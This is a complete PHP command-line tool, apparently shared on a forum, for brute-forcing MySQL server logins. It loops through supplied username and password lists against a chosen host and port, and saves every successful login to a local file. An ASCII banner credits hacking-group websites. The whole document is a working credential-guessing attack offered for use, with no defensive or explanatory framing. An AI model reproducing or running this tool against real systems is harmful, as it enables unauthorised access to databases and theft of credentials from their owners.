Код:
<?php $userlist = @$argv[1]; $passlist = @$argv[2]; $host = @$argv[3]; $port = @$argv[4]; echo " ------------------------------------------------------------------------ _______ _______ _______ _ ( )|\ /|( ____ \( ___ )( \ | () () |( \ / )| ( \/| ( ) || ( | || || | \ (_) / | (_____ | | | || | | |(_)| | \ / (_____ )| | | || | | | | | ) ( ) || | /\| || | | ) ( | | | /\____) || (_\ \ || (____/\ |/ \| \_/ \_______)(____\/_)(_______/ _______ __________________ _______ _______ _ _______ _______ ( ___ )\__ __/\__ __/( ___ )( ____ \| \ /\( ____ \( ____ ) | ( ) | ) ( ) ( | ( ) || ( \/| \ / /| ( \/| ( )| | (___) | | | | | | (___) || | | (_/ / | (__ | (____)| | ___ | | | | | | ___ || | | _ ( | __) | __) | ( ) | | | | | | ( ) || | | ( \ \ | ( | (\ ( | ) ( | | | | | | ) ( || (____/\| / \ \| (____/\| ) \ \__ |/ \| )_( )_( |/ \|(_______/|_/ \/(_______/|/ \__/ Coded by blink/zeN @ DarkCode.me - DUSecurity.com - EngimaGroup.org Usage : php mysql-brute.php <userlist> <passlist> <host> <port> ------------------------------------------------------------------------\n\n[+] Starting Cracker...\n"; if(!$userlist || !$passlist || !$host || !$port) { die("[-] Incorrect Arguments, Exiting...\n"); } $user = file($userlist); $pass = file($passlist); echo "[+] Loaded ".count($user)." usernames...\n"; echo "[+] Loaded ".count($pass)." passwords...\n"; echo "[+] Testing Connection to $host:$port...\n"; echo "-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n"; mysql_connect($host.':'.$port,"test","test"); echo "\n-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-"; echo "\n[?] Continue (y/n)? "; $ans = fread(STDIN, 1); if($ans != "y") { die("[-] Exiting...\n"); } foreach($user as $uname) { $uname = substr_replace($uname ,"",-2); echo "[+] Trying Username : $uname\n"; foreach($pass as $pword) { $pword = substr_replace($pword ,"",-2); $link = @mysql_connect($host.':'.$port,$uname,$pword); if($link) { print "\n\n[+] Found Login - ".$uname; print "\n|---------------> ".$pword; SaveLogin($uname,$pword,$host,$port); sleep(2); break; } print "\n[-] Incorrect - ".$uname; print "\n|-------------> ".$pword; @mysql_close($link); } sleep(3); } die("[-] Finished Attack, Exiting...\n"); function SaveLogin($user, $pass, $host, $port){ $log = "MySQL - $user:$pass@$host:$port\r\n"; $save = fopen("logins.txt","a"); fwrite($save, $log); fclose($save); } ?>